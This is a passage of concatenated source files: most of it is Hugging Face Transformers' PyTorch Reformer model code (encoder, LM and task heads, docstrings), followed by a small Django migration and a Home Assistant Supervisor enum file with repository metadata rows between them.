# hidden_states and attention lists to be filled if wished
all_hidden_states = []
all_attentions = []
# init cached hidden states if necessary
if past_buckets_states is None:
past_buckets_states = [((None), (None)) for i in range(len(self.layers))]
# concat same tensor for reversible ResNet
hidden_states = torch.cat([hidden_states, hidden_states], dim=-1)
hidden_states = _ReversibleFunction.apply(
hidden_states,
self.layers,
attention_mask,
head_mask,
num_hashes,
all_hidden_states,
all_attentions,
past_buckets_states,
use_cache,
orig_sequence_length,
output_hidden_states,
output_attentions,
)
# Apply layer norm to concatenated hidden states
hidden_states = self.layer_norm(hidden_states)
# Apply dropout
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
return ReformerEncoderOutput(
hidden_states=hidden_states,
all_hidden_states=all_hidden_states,
all_attentions=all_attentions,
past_buckets_states=past_buckets_states,
)
class ReformerOnlyLMHead(nn.Module):
def __init__(self, config):
super().__init__()
# Reformer is using Rev Nets, thus last layer outputs are concatenated and
# Layer Norm is done over 2 * hidden_size
self.seq_len_dim = 1
self.chunk_size_lm_head = config.chunk_size_lm_head
self.decoder = nn.Linear(2 * config.hidden_size, config.vocab_size, bias=False)
self.bias = nn.Parameter(torch.zeros(config.vocab_size))
# Need a link between the two variables so that the bias is correctly resized with `resize_token_embeddings`
self.decoder.bias = self.bias
def forward(self, hidden_states):
return apply_chunking_to_forward(self.chunk_size_lm_head, self.seq_len_dim, self.forward_chunk, hidden_states)
def forward_chunk(self, hidden_states):
hidden_states = self.decoder(hidden_states)
return hidden_states
class ReformerPreTrainedModel(PreTrainedModel):
""" An abstract class to handle weights initialization and
a simple interface for downloading and loading pretrained models.
"""
config_class = ReformerConfig
base_model_prefix = "reformer"
@property
def dummy_inputs(self):
input_ids = torch.tensor(DUMMY_INPUTS)
input_mask = torch.tensor(DUMMY_MASK)
dummy_inputs = {
"input_ids": input_ids,
"attention_mask": input_mask,
}
return dummy_inputs
def _init_weights(self, module):
""" Initialize the weights """
if isinstance(module, AxialPositionEmbeddings):
for weight in module.weights:
torch.nn.init.normal_(weight, std=self.config.axial_norm_std)
elif isinstance(module, nn.Embedding):
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
elif isinstance(module, nn.Linear):
# Slightly different from the TF version which uses truncated_normal for initialization
# cf https://github.com/pytorch/pytorch/pull/5617
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
elif isinstance(module, nn.LayerNorm):
module.bias.data.zero_()
module.weight.data.fill_(1.0)
if isinstance(module, nn.Linear) and module.bias is not None:
module.bias.data.zero_()
@dataclass
class ReformerModelOutput(ModelOutput):
"""
Output type of :class:`~transformers.ReformerModel`.
Args:
last_hidden_state (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, num_predict, hidden_size)`):
Sequence of hidden-states at the last layer of the model.
``num_predict`` corresponds to ``target_mapping.shape[1]``. If ``target_mapping`` is ``None``, then
``num_predict`` corresponds to ``sequence_length``.
past_buckets_states (:obj:`List[Tuple(torch.LongTensor, torch.FloatTensor)]`, `optional`, returned when ``use_cache=True`` is passed or when ``config.use_cache=True``):
List of :obj:`tuple(torch.LongTensor, torch.FloatTensor` of length :obj:`config.n_layers`, with :obj:`tuple(0)` being the previous `buckets` of shape
:obj:`(batch_size, num_heads, num_hashes, sequence_length)`)
and :obj:`tuple(1)` being the previous `hidden_states` of shape
:obj:`(batch_size, sequence_length, hidden_size)`).
Contains pre-computed buckets and hidden-states that can be used (see
``past_buckets_states`` input) to speed up sequential decoding.
hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
of shape :obj:`(batch_size, sequence_length, hidden_size)`.
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape
:obj:`(batch_size, num_heads, sequence_length, sequence_length)`.
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
heads.
"""
last_hidden_state: torch.FloatTensor
past_buckets_states: Optional[List[Tuple[torch.LongTensor, torch.FloatTensor]]] = None
hidden_states: Optional[Tuple[torch.FloatTensor]] = None
attentions: Optional[Tuple[torch.FloatTensor]] = None
@dataclass
class ReformerModelWithLMHeadOutput(ModelOutput):
"""
Output type of :class:`~transformers.ReformerModelWithLMHead`.
Args:
loss (:obj:`torch.FloatTensor` of shape `(1,)`, `optional`, returned when ``labels`` is provided)
Language modeling loss (for next-token prediction).
logits (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, num_predict, config.vocab_size)`):
Prediction scores of the language modeling head (scores for each vocabulary token before SoftMax).
``num_predict`` corresponds to ``target_mapping.shape[1]``. If ``target_mapping`` is ``None``, then
``num_predict`` corresponds to ``sequence_length``.
past_buckets_states (:obj:`List[Tuple(torch.LongTensor, torch.FloatTensor)]`, `optional`, returned when ``use_cache=True`` is passed or when ``config.use_cache=True``):
List of :obj:`tuple(torch.LongTensor, torch.FloatTensor` of length :obj:`config.n_layers`, with :obj:`tuple(0)` being the previous `buckets` of shape
:obj:`(batch_size, num_heads, num_hashes, sequence_length)`)
and :obj:`tuple(1)` being the previous `hidden_states` of shape
:obj:`(batch_size, sequence_length, hidden_size)`).
Contains pre-computed buckets and hidden-states that can be used (see
``past_buckets_states`` input) to speed up sequential decoding.
hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
of shape :obj:`(batch_size, sequence_length, hidden_size)`.
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape
:obj:`(batch_size, num_heads, sequence_length, sequence_length)`.
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
heads.
"""
loss: Optional[torch.FloatTensor] = None
logits: torch.FloatTensor = None
past_buckets_states: Optional[List[Tuple[torch.LongTensor, torch.FloatTensor]]] = None
hidden_states: Optional[Tuple[torch.FloatTensor]] = None
attentions: Optional[Tuple[torch.FloatTensor]] = None
REFORMER_START_DOCSTRING = r"""
Reformer was proposed in `Reformer: The Efficient Transformer <https://arxiv.org/abs/2001.0445>`__
by Nikita Kitaev, Łukasz Kaiser, Anselm Levskaya.
This model is a PyTorch `torch.nn.Module <https://pytorch.org/docs/stable/nn.html#torch.nn.Module>`__ sub-class.
Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general
usage and behavior.
Parameters:
config (:class:`~transformers.ReformerConfig`): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the configuration.
Check out the :meth:`~transformers.PreTrainedModel.from_pretrained` method to load the model weights.
"""
REFORMER_INPUTS_DOCSTRING = r"""
Args:
input_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary.
During training the input_ids sequence_length has to be a multiple of the relevant model's
chunk lengths (lsh's, local's or both). During evaluation, the indices are automatically
padded to be a multiple of the chunk length.
Indices can be obtained using :class:`transformers.ReformerTokenizer`.
See :func:`transformers.PreTrainedTokenizer.encode` and
:func:`transformers.PreTrainedTokenizer.__call__` for details.
`What are input IDs? <../glossary.html#input-ids>`__
attention_mask (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`, defaults to :obj:`None`):
Mask to avoid performing attention on padding token indices.
Mask values selected in ``[0, 1]``:
``1`` for tokens that are NOT MASKED, ``0`` for MASKED tokens.
`What are attention masks? <../glossary.html#attention-mask>`__
position_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`, defaults to :obj:`None`):
Indices of positions of each input sequence tokens in the position embeddings.
Selected in the range ``[0, config.max_position_embeddings - 1]``.
`What are position IDs? <../glossary.html#position-ids>`_
head_mask (:obj:`torch.FloatTensor` of shape :obj:`(num_heads,)` or :obj:`(num_layers, num_heads)`, `optional`, defaults to :obj:`None`):
Mask to nullify selected heads of the self-attention modules.
Mask values selected in ``[0, 1]``:
:obj:`1` indicates the head is **not masked**, :obj:`0` indicates the head is **masked**.
inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`, defaults to :obj:`None`):
Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded representation.
This is useful if you want more control over how to convert `input_ids` indices into associated vectors
than the model's internal embedding lookup matrix.
num_hashes (:obj:`int`, `optional`, defaults to :obj:`None`):
`num_hashes` is the number of hashing rounds that should be performed during
bucketing. Setting `num_hashes` overwrites the default `num_hashes` defined
in `config.num_hashes`.
For more information, see `num_hashes` in :class:`transformers.ReformerConfig`.
past_buckets_states (:obj:`List[Tuple(torch.LongTensor, torch.FloatTensor)]`, `optional`, defaults `None`):
List of :obj:`tuple(torch.LongTensor, torch.FloatTensor` of length :obj:`config.n_layers`, with :obj:`tuple(0)` being the previous `buckets` of shape
:obj:`(batch_size, num_heads, num_hashes, sequence_length)`)
and :obj:`tuple(1)` being the previous `hidden_states` of shape
:obj:`(batch_size, sequence_length, hidden_size)`).
List of tuples that contains all previous computed hidden states and buckets (only relevant for LSH Self-Attention). Can be used to speed up sequential decoding.
use_cache (:obj:`bool`, `optional`, defaults to :obj:`None`):
If set to ``True``, the ``past_buckets_states`` of all attention layers are returned.
output_attentions (:obj:`bool`, `optional`, defaults to :obj:`None`):
If set to ``True``, the attentions tensors of all attention layers are returned. See ``attentions`` under returned tensors for more detail.
output_hidden_states (:obj:`bool`, `optional`, defaults to :obj:`None`):
If set to ``True``, the hidden states of all layers are returned. See ``hidden_states`` under returned tensors for more detail.
return_dict (:obj:`bool`, `optional`, defaults to :obj:`None`):
If set to ``True``, the model will return a :class:`~transformers.file_utils.ModelOutput` instead of a
plain tuple.
"""
@add_start_docstrings(
"The bare Reformer Model transformer outputting raw hidden-states" "without any specific head on top.",
REFORMER_START_DOCSTRING,
)
class ReformerModel(ReformerPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.config = config
assert (
self.config.num_hidden_layers > 0
), "`config.attn_layers` is empty. Select at least one attn layer form ['lsh', 'local']"
self.embeddings = ReformerEmbeddings(config)
self.encoder = ReformerEncoder(config)
self.init_weights()
def get_input_embeddings(self):
return self.embeddings.word_embeddings
def set_input_embeddings(self, value):
self.embeddings.word_embeddings = value
def _prune_heads(self, heads_to_prune):
""" Prunes heads of the model.
heads_to_prune: dict of {layer_num: list of heads to prune in this layer}
See base class PreTrainedModel
"""
for layer, heads in heads_to_prune.items():
self.encoder.layer[layer].attention.prune_heads(heads)
@add_start_docstrings_to_callable(REFORMER_INPUTS_DOCSTRING)
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="google/reformer-crime-and-punishment",
output_type=ReformerModelOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids=None,
attention_mask=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
num_hashes=None,
past_buckets_states=None,
use_cache=None,
output_hidden_states=None,
output_attentions=None,
return_dict=None,
):
use_cache = use_cache if use_cache is not None else self.config.use_cache
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif input_ids is not None:
input_shape = input_ids.size() # noqa: F841
device = input_ids.device
elif inputs_embeds is not None:
input_shape = inputs_embeds.size()[:-1] # noqa: F841
device = inputs_embeds.device
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
assert (
len(input_shape) == 2
), "`input_ids` have be of shape `[batch_size, sequence_length]`, but got shape: {}".format(input_shape)
if past_buckets_states is not None:
assert not self.training, "`past_buckets_states` can only be used for inference, not for training`."
# prepare head mask
head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers, is_attention_chunked=True)
# original sequence length for padding
orig_sequence_length = input_shape[-1]
# if needs padding
least_common_mult_chunk_length = _get_least_common_mult_chunk_len(self.config)
min_chunk_length = _get_min_chunk_len(self.config)
must_pad_to_match_chunk_length = (
input_shape[-1] % least_common_mult_chunk_length != 0
and input_shape[-1] > min_chunk_length
and past_buckets_states is None
)
if must_pad_to_match_chunk_length:
padding_length = least_common_mult_chunk_length - input_shape[-1] % least_common_mult_chunk_length
if self.training is True:
raise ValueError(
"If training, sequence Length {} has to be a multiple of least common multiple chunk_length {}. Please consider padding the input to a length of {}.".format(
input_shape[-1], least_common_mult_chunk_length, input_shape[-1] + padding_length
)
)
# pad input
input_ids, inputs_embeds, attention_mask, position_ids, input_shape = self._pad_to_mult_of_chunk_length(
input_ids,
inputs_embeds=inputs_embeds,
attention_mask=attention_mask,
position_ids=position_ids,
input_shape=input_shape,
padding_length=padding_length,
padded_seq_length=least_common_mult_chunk_length,
device=device,
)
# start index for postion encoding depends on incremental decoding
if past_buckets_states is not None:
start_idx_pos_encodings = past_buckets_states[0][1].shape[1]
else:
start_idx_pos_encodings = 0
embedding_output = self.embeddings(
input_ids=input_ids,
position_ids=position_ids,
inputs_embeds=inputs_embeds,
start_idx_pos_encodings=start_idx_pos_encodings,
)
encoder_outputs = self.encoder(
hidden_states=embedding_output,
head_mask=head_mask,
attention_mask=attention_mask,
num_hashes=num_hashes,
past_buckets_states=past_buckets_states,
use_cache=use_cache,
orig_sequence_length=orig_sequence_length,
output_hidden_states=output_hidden_states,
output_attentions=output_attentions,
)
sequence_output = encoder_outputs.hidden_states
# if padding was applied
if must_pad_to_match_chunk_length:
sequence_output = sequence_output[:, :orig_sequence_length]
past_buckets_states = encoder_outputs.past_buckets_states if use_cache else None
hidden_states = encoder_outputs.all_hidden_states if output_hidden_states else None
attentions = encoder_outputs.all_attentions if output_attentions else None
if not return_dict:
return tuple(v for v in [sequence_output, past_buckets_states, hidden_states, attentions] if v is not None)
return ReformerModelOutput(
last_hidden_state=sequence_output,
past_buckets_states=past_buckets_states,
hidden_states=hidden_states,
attentions=attentions,
)
def _pad_to_mult_of_chunk_length(
self,
input_ids,
inputs_embeds=None,
attention_mask=None,
position_ids=None,
input_shape=None,
padding_length=None,
padded_seq_length=None,
device=None,
):
logger.info(
"Input ids are automatically padded from {} to {} to be a multiple of `config.chunk_length`: {}".format(
input_shape[-1], input_shape[-1] + padding_length, padded_seq_length
)
)
padded_input_ids = torch.full(
(input_shape[0], padding_length), self.config.pad_token_id, device=device, dtype=torch.long,
)
# Extend `attention_mask`
if attention_mask is not None:
pad_attention_mask = torch.zeros(input_shape[0], padding_length, device=device, dtype=attention_mask.dtype)
attention_mask = torch.cat([attention_mask, pad_attention_mask], dim=-1)
else:
attention_mask = torch.cat(
[
torch.ones(input_shape, device=device, dtype=torch.uint8),
torch.zeros((input_shape[0], padding_length), device=device, dtype=torch.uint8),
],
dim=-1,
)
# Extend `input_ids` with padding to match least common multiple chunk_length
if input_ids is not None:
input_ids = torch.cat([input_ids, padded_input_ids], dim=-1)
input_shape = input_ids.size()
# Pad position ids if given
if position_ids is not None:
padded_position_ids = torch.arange(input_shape[-1], padded_seq_length, dtype=torch.long, device=device)
padded_position_ids = position_ids.unsqueeze(0).expand(input_shape[0], padding_length)
position_ids = torch.cat([position_ids, padded_position_ids], dim=-1)
# Extend `inputs_embeds` with padding to match least common multiple chunk_length
if inputs_embeds is not None:
padded_inputs_embeds = self.embeddings(padded_input_ids, position_ids)
inputs_embeds = torch.cat([inputs_embeds, padded_inputs_embeds], dim=-2)
input_shape = inputs_embeds.size()
return input_ids, inputs_embeds, attention_mask, position_ids, input_shape
@add_start_docstrings("""Reformer Model with a `language modeling` head on top. """, REFORMER_START_DOCSTRING)
class ReformerModelWithLMHead(ReformerPreTrainedModel):
def __init__(self, config):
super().__init__(config)
assert config.is_decoder, "If you want to use `ReformerModelWithLMHead` make sure that `is_decoder=True`."
assert (
"local" not in self.config.attn_layers or config.local_num_chunks_after == 0
), f"If causal mask is enabled, make sure that `config.local_num_chunks_after` is set to 0 and not {config.local_num_chunks_after}."
assert (
"lsh" not in self.config.attn_layers or config.lsh_num_chunks_after == 0
), f"If causal mask is enabled, make sure that `config.lsh_num_chunks_after` is set to 1 and not {config.lsh_num_chunks_after}."
self.reformer = ReformerModel(config)
self.lm_head = ReformerOnlyLMHead(config)
self.init_weights()
def get_output_embeddings(self):
return self.lm_head.decoder
def tie_weights(self):
# word embeddings are not tied in Reformer
pass
@add_start_docstrings_to_callable(REFORMER_INPUTS_DOCSTRING)
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="google/reformer-crime-and-punishment",
output_type=CausalLMOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids=None,
position_ids=None,
attention_mask=None,
head_mask=None,
inputs_embeds=None,
num_hashes=None,
past_buckets_states=None,
use_cache=None,
output_hidden_states=None,
output_attentions=None,
return_dict=None,
labels=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`, defaults to :obj:`None`):
Labels for computing the sequence classification/regression loss.
Indices should be in :obj:`[-100, 0, ..., config.vocab_size - 1]`.
All labels set to ``-100`` are ignored (masked), the loss is only
computed for labels in ``[0, ..., config.vocab_size]``
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
reformer_outputs = self.reformer(
input_ids,
position_ids=position_ids,
attention_mask=attention_mask,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
num_hashes=num_hashes,
past_buckets_states=past_buckets_states,
use_cache=use_cache,
output_hidden_states=output_hidden_states,
output_attentions=output_attentions,
return_dict=return_dict,
)
sequence_output = reformer_outputs[0]
logits = self.lm_head(sequence_output)
loss = None
if labels is not None:
# Shift so that tokens < n predict n
shift_logits = logits[..., :-1, :].contiguous()
shift_labels = labels[..., 1:].contiguous()
# Flatten the tokens
loss_fct = CrossEntropyLoss()
loss = loss_fct(shift_logits.view(-1, self.config.vocab_size), shift_labels.view(-1))
if not return_dict:
output = (logits,) + reformer_outputs[1:]
return ((loss,) + output) if loss is not None else output
return ReformerModelWithLMHeadOutput(
loss=loss,
logits=logits,
past_buckets_states=reformer_outputs.past_buckets_states,
hidden_states=reformer_outputs.hidden_states,
attentions=reformer_outputs.attentions,
)
def prepare_inputs_for_generation(self, input_ids, past, **kwargs):
# only last token for inputs_ids if past is defined in kwargs
if past is not None:
input_ids = input_ids[:, -1:]
inputs_dict = {
"input_ids": input_ids,
"past_buckets_states": past,
"use_cache": kwargs["use_cache"],
}
if "num_hashes" in kwargs:
inputs_dict["num_hashes"] = kwargs["num_hashes"]
return inputs_dict
def _reorder_cache(self, past, beam_idx):
reord_past_buckets_states = []
for layer_past in past:
# buckets
if layer_past[0] is not None:
reord_buckets = layer_past[0].index_select(0, beam_idx)
else:
reord_buckets = None
# hidden states
reord_hidden_states = layer_past[1].index_select(0, beam_idx)
reord_past_buckets_states.append((reord_buckets, reord_hidden_states))
return reord_past_buckets_states
@add_start_docstrings("""Reformer Model with a `language modeling` head on top. """, REFORMER_START_DOCSTRING)
class ReformerForMaskedLM(ReformerPreTrainedModel):
def __init__(self, config):
super().__init__(config)
assert (
not config.is_decoder
), "If you want to use `ReformerForMaskedLM` make sure `config.is_decoder=False` for bi-directional self-attention."
self.reformer = ReformerModel(config)
self.lm_head = ReformerOnlyLMHead(config)
self.init_weights()
def get_output_embeddings(self):
return self.lm_head.decoder
def tie_weights(self):
# word embeddings are not tied in Reformer
pass
@add_start_docstrings_to_callable(REFORMER_INPUTS_DOCSTRING)
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="google/reformer-crime-and-punishment",
output_type=MaskedLMOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids=None,
position_ids=None,
attention_mask=None,
head_mask=None,
inputs_embeds=None,
num_hashes=None,
labels=None,
output_hidden_states=None,
output_attentions=None,
return_dict=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`, defaults to :obj:`None`):
Labels for computing the masked language modeling loss.
Indices should be in ``[-100, 0, ..., config.vocab_size]`` (see ``input_ids`` docstring)
Tokens with indices set to ``-100`` are ignored (masked), the loss is only computed for the tokens with labels
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
reformer_outputs = self.reformer(
input_ids,
position_ids=position_ids,
attention_mask=attention_mask,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
num_hashes=num_hashes,
use_cache=False, # no causal mask
output_hidden_states=output_hidden_states,
output_attentions=output_attentions,
return_dict=return_dict,
)
sequence_output = reformer_outputs[0]
logits = self.lm_head(sequence_output)
masked_lm_loss = None
if labels is not None:
loss_fct = CrossEntropyLoss() # -100 index = padding token
masked_lm_loss = loss_fct(logits.view(-1, self.config.vocab_size), labels.view(-1))
if not return_dict:
output = (logits,) + reformer_outputs[1:]
return ((masked_lm_loss,) + output) if masked_lm_loss is not None else output
return MaskedLMOutput(
loss=masked_lm_loss,
logits=logits,
hidden_states=reformer_outputs.hidden_states,
attentions=reformer_outputs.attentions,
)
@add_start_docstrings(
"""Reformer Model transformer with a sequence classification/regression head on top (a linear layer
on top of the pooled output) e.g. for GLUE tasks. """,
REFORMER_START_DOCSTRING,
)
class ReformerForSequenceClassification(ReformerPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.reformer = ReformerModel(config)
self.classifier = ReformerClassificationHead(config)
if config.is_decoder is True:
logger.warning("You might want to disable causal masking for sequence classification")
self.init_weights()
def tie_weights(self):
# word embeddings are not tied in Reformer
pass
@add_start_docstrings_to_callable(REFORMER_INPUTS_DOCSTRING)
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="google/reformer-crime-and-punishment",
output_type=SequenceClassifierOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids=None,
position_ids=None,
attention_mask=None,
head_mask=None,
inputs_embeds=None,
num_hashes=None,
labels=None,
output_hidden_states=None,
output_attentions=None,
return_dict=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`, defaults to :obj:`None`):
Labels for computing the sequence classification/regression loss.
Indices should be in :obj:`[0, ..., config.num_labels - 1]`.
If :obj:`config.num_labels == 1` a regression loss is computed (Mean-Square loss),
If :obj:`config.num_labels > 1` a classification loss is computed (Cross-Entropy).
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.reformer(
input_ids,
position_ids=position_ids,
attention_mask=attention_mask,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
num_hashes=num_hashes,
output_hidden_states=output_hidden_states,
output_attentions=output_attentions,
return_dict=return_dict,
)
sequence_output = outputs[0]
logits = self.classifier(sequence_output)
loss = None
if labels is not None:
if self.num_labels == 1:
# We are doing regression
loss_fct = MSELoss()
loss = loss_fct(logits.view(-1), labels.view(-1))
else:
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
if not return_dict:
output = (logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return SequenceClassifierOutput(
loss=loss, logits=logits, hidden_states=outputs.hidden_states, attentions=outputs.attentions,
)
class ReformerClassificationHead(nn.Module):
"""Head for sentence-level classification tasks."""
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(2 * config.hidden_size, config.hidden_size)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
self.out_proj = nn.Linear(config.hidden_size, config.num_labels)
def forward(self, hidden_states, **kwargs):
hidden_states = hidden_states[:, 0, :] # take <s> token (equiv. to [CLS])
hidden_states = self.dropout(hidden_states)
hidden_states = self.dense(hidden_states)
hidden_states = torch.tanh(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.out_proj(hidden_states)
return hidden_states
@add_start_docstrings(
"""Reformer Model with a span classification head on top for
extractive question-answering tasks like SQuAD / TriviaQA ( a linear layer on
top of hidden-states output to compute `span start logits` and `span end logits`. """,
REFORMER_START_DOCSTRING,
)
class ReformerForQuestionAnswering(ReformerPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.reformer = ReformerModel(config)
# 2 * config.hidden_size because we use reversible residual layers
self.qa_outputs = nn.Linear(2 * config.hidden_size, config.num_labels)
self.init_weights()
def tie_weights(self):
# word embeddings are not tied in Reformer
pass
@add_start_docstrings_to_callable(REFORMER_INPUTS_DOCSTRING)
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="google/reformer-crime-and-punishment",
output_type=QuestionAnsweringModelOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids=None,
position_ids=None,
attention_mask=None,
head_mask=None,
inputs_embeds=None,
num_hashes=None,
start_positions=None,
end_positions=None,
output_hidden_states=None,
output_attentions=None,
return_dict=None,
):
r"""
start_positions (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`, defaults to :obj:`None`):
Labels for position (index) of the start of the labelled span for computing the token classification loss.
Positions are clamped to the length of the sequence (`sequence_length`).
Position outside of the sequence are not taken into account for computing the loss.
end_positions (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`, defaults to :obj:`None`):
Labels for position (index) of the end of the labelled span for computing the token classification loss.
Positions are clamped to the length of the sequence (`sequence_length`).
Position outside of the sequence are not taken into account for computing the loss.
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
reformer_outputs = self.reformer(
input_ids,
position_ids=position_ids,
attention_mask=attention_mask,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
num_hashes=num_hashes,
use_cache=False, # no causal mask
output_hidden_states=output_hidden_states,
output_attentions=output_attentions,
return_dict=return_dict,
)
sequence_output = reformer_outputs[0]
logits = self.qa_outputs(sequence_output)
start_logits, end_logits = logits.split(1, dim=-1)
start_logits = start_logits.squeeze(-1)
end_logits = end_logits.squeeze(-1)
total_loss = None
if start_positions is not None and end_positions is not None:
# If we are on multi-GPU, split add a dimension
if len(start_positions.size()) > 1:
start_positions = start_positions.squeeze(-1)
if len(end_positions.size()) > 1:
end_positions = end_positions.squeeze(-1)
# sometimes the start/end positions are outside our model inputs, we ignore these terms
ignored_index = start_logits.size(1)
start_positions.clamp_(0, ignored_index)
end_positions.clamp_(0, ignored_index)
loss_fct = CrossEntropyLoss(ignore_index=ignored_index)
start_loss = loss_fct(start_logits, start_positions)
end_loss = loss_fct(end_logits, end_positions)
total_loss = (start_loss + end_loss) / 2
if not return_dict:
output = (start_logits, end_logits) + reformer_outputs[1:]
return ((total_loss,) + output) if total_loss is not None else output
return QuestionAnsweringModelOutput(
loss=total_loss,
start_logits=start_logits,
end_logits=end_logits,
hidden_states=reformer_outputs.hidden_states,
attentions=reformer_outputs.attentions,
)
| [
"noreply@github.com"
] | toriving.noreply@github.com |
ef5da6990fdda1ae2e8bccf7b97fade9c5b30c57 | d11b71bd556bbb6c0deccde0122b9ce64b1069cd | /tango_with_django_project/rango/migrations/0083_auto_20150122_0318.py | 8915c75cd213d4b6bf914659e2bd216e405828bc | [] | no_license | Tanner-Stults/hello-world | eeaf8105ac51b6eb5a7ac117fa7c3aff6b3fd112 | 0f568bd73c69abad01e100e4f05a180542af5b49 | refs/heads/master | 2020-06-01T19:55:08.431395 | 2015-07-27T00:10:25 | 2015-07-27T00:10:25 | 27,045,783 | 0 | 0 | null | 2014-11-23T20:17:16 | 2014-11-23T20:09:46 | null | UTF-8 | Python | false | false | 411 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('rango', '0082_auto_20150122_0318'),
]
operations = [
migrations.AlterField(
model_name='workexperience',
name='current',
field=models.BooleanField(default=None),
),
]
| [
"jst274@cornell.edu"
] | jst274@cornell.edu |
ef5cfcba95a6606c5510682302bc8b7563f002b6 | e90bf4b372da78ceec15282d060b48d18ba8d4e9 | /supervisor/backups/const.py | c4b5e593e438d1e447c34ebcb2e8cc63ca5d919e | [
"Apache-2.0"
] | permissive | home-assistant/supervisor | 67f2e1755ff5fbf7cf2084351e1c32c6995274e0 | 4838b280adafed0997f32e021274b531178386cd | refs/heads/main | 2023-08-31T22:51:25.949277 | 2023-08-31T08:01:42 | 2023-08-31T08:01:42 | 84,926,758 | 928 | 477 | Apache-2.0 | 2023-09-14T17:11:27 | 2017-03-14T08:54:15 | Python | UTF-8 | Python | false | false | 945 | py | """Backup consts."""
from enum import StrEnum
BUF_SIZE = 2**20 * 4 # 4MB
class BackupType(StrEnum):
"""Backup type enum."""
FULL = "full"
PARTIAL = "partial"
class BackupJobStage(StrEnum):
"""Backup job stage enum."""
ADDON_REPOSITORIES = "addon_repositories"
ADDONS = "addons"
DOCKER_CONFIG = "docker_config"
FINISHING_FILE = "finishing_file"
FOLDERS = "folders"
HOME_ASSISTANT = "home_assistant"
AWAIT_ADDON_RESTARTS = "await_addon_restarts"
class RestoreJobStage(StrEnum):
"""Restore job stage enum."""
ADDON_REPOSITORIES = "addon_repositories"
ADDONS = "addons"
AWAIT_ADDON_RESTARTS = "await_addon_restarts"
AWAIT_HOME_ASSISTANT_RESTART = "await_home_assistant_restart"
CHECK_HOME_ASSISTANT = "check_home_assistant"
DOCKER_CONFIG = "docker_config"
FOLDERS = "folders"
HOME_ASSISTANT = "home_assistant"
